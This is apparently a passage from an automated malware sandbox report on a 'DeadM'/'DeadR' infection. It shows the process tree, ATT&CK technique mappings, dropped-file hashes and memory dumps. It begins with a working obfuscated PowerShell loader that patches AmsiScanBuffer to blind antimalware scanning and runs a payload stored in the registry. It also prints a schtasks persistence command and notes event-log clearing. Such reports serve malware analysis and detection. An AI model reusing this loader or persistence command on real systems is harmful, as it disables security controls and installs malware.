@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$VofzReHYsww=$QIehSJyxROlos.GetMethod(''+[Char](71)+''+'e'+'t'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+''+'n'+''+[Char](101)+''+'l'+''+'3'+''+[Char](50)+''+[Char](46)+'d'+'l'+''+[Char](108)+'')));$XGQTSIRWBMZdkE=$xoaBFCVDwPEVSi.Invoke($Null,@([Object]$VofzReHYsww,[Object](''+[Char](76)+''+'o'+''+'a'+'d'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+'y'+'A')));$qYeIipaIEDNxlkCld=$xoaBFCVDwPEVSi.Invoke($Null,@([Object]$VofzReHYsww,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$wvOrXDd=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XGQTSIRWBMZdkE,$IhrYRiqTtxinQnhInJD).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$ToOrinINCJloqbaIw=$xoaBFCVDwPEVSi.Invoke($Null,@([Object]$wvOrXDd,[Object](''+[Char](65)+''+'m'+''+[Char](115)+'iS'+'c'+''+'a'+''+'n'+'Bu'+'f'+''+'f'+''+'e'+''+[Char](114)+'')));$xcNxXWnRwf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qYeIipaIEDNxlkCld,$HXIdpQQgNMxMqnHyfbJFPn).Invoke($ToOrinINCJloqbaIw,[uint32]8,4,[ref]$xcNxXWnRwf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ToOrinINCJloqbaIw,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qYeIipaIEDNxlkCld,$HXIdpQQgNMxMqnHyfbJFPn).Invoke($ToOrinINCJloqbaIw,[uint32]8,0x20,[ref]$xcNxXWnRwf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+[Char](84)+''+[Char](87)+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'D'+''+'e'+''+[Char](97)+''+[Char](100)+''+[Char](115)+''+[Char](116)+''+'a'+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2116
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1196
- C:\Users\Admin\AppData\Roaming\DeadM.exe
  C:\Users\Admin\AppData\Roaming\DeadM.exe
  2⤵
  - Executes dropped EXE
  PID:3544
- C:\Users\Admin\AppData\Roaming\DeadM.exe
  C:\Users\Admin\AppData\Roaming\DeadM.exe
  2⤵
  - Executes dropped EXE
  PID:1652
- C:\Users\Admin\AppData\Roaming\DeadM.exe
  C:\Users\Admin\AppData\Roaming\DeadM.exe
  2⤵
  - Executes dropped EXE
  PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1344
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:3028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1464

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1720

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1856

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2028

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1788

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2080

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2204

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2608

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2672

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2224

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3148

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3220
- C:\Users\Admin\AppData\Local\Temp\XClient66.exe
  "C:\Users\Admin\AppData\Local\Temp\XClient66.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3508
- - C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    PID:2476
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "DeadM" /tr "C:\Users\Admin\AppData\Roaming\DeadM.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1656
- - C:\Users\Admin\AppData\Local\Temp\DeadR.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4000
- - C:\Users\Admin\AppData\Local\Temp\DeadR.exe
    "C:\Users\Admin\AppData\Local\Temp\DeadR.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3500

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3852

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3904

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:4060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4444

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4944

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3976

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:1580

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3588

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3616

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:1840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4160

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:2324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
1⤵
PID:1140
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2b8,0x7ff91e10f208,0x7ff91e10f214,0x7ff91e10f220
  2⤵
  PID:4116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,15195321112227810029,13870653243844057049,262144 --variations-seed-version --mojo-platform-channel-handle=2168 /prefetch:11
  2⤵
  PID:3912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=3864,i,15195321112227810029,13870653243844057049,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:14
  2⤵
  PID:4744
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=4664,i,15195321112227810029,13870653243844057049,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:14
  2⤵
  PID:4224

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
1⤵
- Drops file in Windows directory
PID:2292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:3972

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks processor information in registry
PID:4176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DeadM.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
16KB

MD5
4b13e5502a3176b9773e2de8b4184af4

SHA1
6130fca8f4371fe946c90acb9f2ebbaba7fba503

SHA256
fda5ced4a4e0f49f4373a33ab794e2a869c479e688ca63699ecd7ce6a4001d08

SHA512
c7e80a6008c5bfec89a9d1bdba581cd84ae6cae1958ffc5b49503e41f2450a8eeae4aaad91345da412bffb0a180dade2b5344ab875d01e0f0f7d9b316b83f85f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
44KB

MD5
78bf56f7bf49b19c795186613cdd08d2

SHA1
7ef64732eabb1f0249eafd942708b431142e656b

SHA256
f79fab4f6733156abccda91304034708db5ccb0dd318661089ee0b37a6befd47

SHA512
c5a4d4ebbdcf3621088aa61352dea2abb4aba36db786704c1c0118c2b84ef39a4f910328323c432c8446f67465266c728b63dd4c4a117f0667e2d15f461fad72

Download Submit
C:\Users\Admin\AppData\Local\Temp\DeadMdzj.exe

Filesize
35KB

MD5
a511516966279868f29c49bba981673b

SHA1
d6e9d37f297da33fc7ae15950e8ccd8e5a2b4792

SHA256
ac0ca438e575070c22819b08c8048316c722eee872525ece4f724745dee7b8aa

SHA512
2712fac1d5972b9aebe97fdaad045b92a30798f1b86eb0f33d63f51abc2f2703237f32d08d6a941b720822b2151e152e437a9294f6017365682dd0d03c5a11bb

Download Submit
C:\Users\Admin\AppData\Local\Temp\DeadR.exe

Filesize
151KB

MD5
b8479a23c22cf6fc456e197939284069

SHA1
b2d98cc291f16192a46f363d007e012d45c63300

SHA256
18294ee5a6383a48d1bcf2703f17d815529df3a17580e027c3efea1800900e8f

SHA512
786cd468ce3723516dc869b09e008ec5d35d1f0c1a61e70083a3be15180866be637bd7d8665c2f0218c56875a0ee597c277e088f77dd403bdd2182d06bad3bd4

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_cbebcr23.bzn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

Filesize
340B

MD5
a8c60a9b481fb30a0908cfdc1dfa2794

SHA1
8e389b3ac3194f44fd4a0de1259e9f7d27b85ad7

SHA256
3dc0d1b380ee6b29ee7d0a52f2722eabb34fc923e6b0fa16f96493ce25c174ef

SHA512
959d168102dc1b274f1f10d0a4cf97dc68fcaa5de6e367440d7366a9822cd704714563b90e6c425229f0588c68d935b3c71842303176e536f7188b6b7d38cc42

Download Submit
memory/464-92-0x000001CF6D5A0000-0x000001CF6D5C7000-memory.dmp

Filesize
156KB

Download
memory/464-98-0x000001CF6D5A0000-0x000001CF6D5C7000-memory.dmp

Filesize
156KB

Download
memory/464-99-0x00007FF906E30000-0x00007FF906E40000-memory.dmp

Filesize
64KB

Download
memory/644-57-0x0000014178E00000-0x0000014178E22000-memory.dmp

Filesize
136KB

Download
memory/644-58-0x0000014178E30000-0x0000014178E57000-memory.dmp

Filesize
156KB

Download
memory/644-59-0x0000014178E30000-0x0000014178E57000-memory.dmp

Filesize
156KB

Download
memory/644-65-0x0000014178E30000-0x0000014178E57000-memory.dmp

Filesize
156KB

Download
memory/644-66-0x00007FF906E30000-0x00007FF906E40000-memory.dmp

Filesize
64KB

Download
memory/704-77-0x00007FF906E30000-0x00007FF906E40000-memory.dmp

Filesize
64KB

Download
memory/704-76-0x000002379D7B0000-0x000002379D7D7000-memory.dmp

Filesize
156KB

Download
memory/704-70-0x000002379D7B0000-0x000002379D7D7000-memory.dmp

Filesize
156KB

Download
memory/760-103-0x0000024DE8970000-0x0000024DE8997000-memory.dmp

Filesize
156KB

Download
memory/1008-88-0x00007FF906E30000-0x00007FF906E40000-memory.dmp

Filesize
64KB

Download
memory/1008-81-0x0000010DC9780000-0x0000010DC97A7000-memory.dmp

Filesize
156KB

Download
memory/1008-87-0x0000010DC9780000-0x0000010DC97A7000-memory.dmp

Filesize
156KB

Download
memory/2116-42-0x00007FF946DA0000-0x00007FF946FA9000-memory.dmp

Filesize
2.0MB

Download
memory/2116-43-0x00007FF945730000-0x00007FF9457ED000-memory.dmp

Filesize
756KB

Download
memory/2116-33-0x00000256A6830000-0x00000256A6852000-memory.dmp

Filesize
136KB

Download
memory/2116-41-0x00000256BF1A0000-0x00000256BF1C8000-memory.dmp

Filesize
160KB

Download
memory/2400-30-0x00007FF925830000-0x00007FF9262F2000-memory.dmp

Filesize
10.8MB

Download
memory/2400-752-0x00007FF925830000-0x00007FF9262F2000-memory.dmp

Filesize
10.8MB

Download
memory/2476-15-0x00000000003B0000-0x00000000003C0000-memory.dmp

Filesize
64KB

Download
memory/2476-790-0x00007FF925830000-0x00007FF9262F2000-memory.dmp

Filesize
10.8MB

Download
memory/2476-31-0x00007FF925830000-0x00007FF9262F2000-memory.dmp

Filesize
10.8MB

Download
memory/3188-51-0x00007FF945730000-0x00007FF9457ED000-memory.dmp

Filesize
756KB

Download
memory/3188-49-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3188-47-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3188-54-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3188-45-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3188-44-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3188-50-0x00007FF946DA0000-0x00007FF946FA9000-memory.dmp

Filesize
2.0MB

Download
memory/3188-46-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3508-0-0x00007FF925833000-0x00007FF925835000-memory.dmp

Filesize
8KB

Download
memory/3508-1-0x0000000000D00000-0x0000000000D84000-memory.dmp

Filesize
528KB

Download